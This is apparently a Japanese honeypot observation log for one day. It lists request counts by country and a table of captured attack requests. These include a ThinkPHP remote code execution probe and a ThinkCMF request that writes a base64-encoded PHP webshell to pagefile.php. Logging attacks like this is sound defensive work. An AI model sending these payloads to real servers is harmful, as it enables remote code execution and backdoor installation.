WOWHoneypot観察(229日目)
2019/10/31(木)
トータルは71件でした。
ハンティングログはありませんでした。
IPのロケーション別の件数は以下です。
中国 | 23 |
アメリカ | 16 |
オランダ | 6 |
ブラジル | 6 |
トルコ | 3 |
イラン | 2 |
ロシア | 2 |
イギリス | 2 |
イタリア | 1 |
ギリシャ | 1 |
スロバキア | 1 |
ウクライナ | 1 |
フィリピン | 1 |
アルゼンチン | 1 |
コロンビア | 1 |
アルバニア | 1 |
ポーランド | 1 |
マレーシア | 1 |
インドネシア | 1 |
件数 | 概要 | リクエスト |
---|---|---|
45 | アクセス | GET / |
5 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
4 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
4 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
3 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
2 | GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status | |
1 | Webshell設置の調査 | POST /pagefile.php |
1 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
1 | 調査 | HEAD / |
1 | 調査 | GET /script |
1 | cfgファイルの調査 | GET /pps/cisco/cisco.cfg |
1 | cfgファイルの調査 | GET /app/provision/y000000000000.cfg |
1 | ThinkCMFの脆弱性を狙った通信 | GET /?a=fetch&templateFile=public/inde&prefix=%27%27&content=%3Cphp%3Efile_put_contents(%27pagefile.php%27,base64_decode('PD9waHAgcHJlZ19yZXBsYWNlKCcvW2Vycm9ycGFnZV0vZScsQHN0cl9yb3QxMygnQG5mZnJlZygkX0NCRkdbY250cl0pOycpLCdzYWZ0Jyk7Pz4='))%3C/php%3E |
1 | 不正中継の試み | CONNECT www.google.com:443 |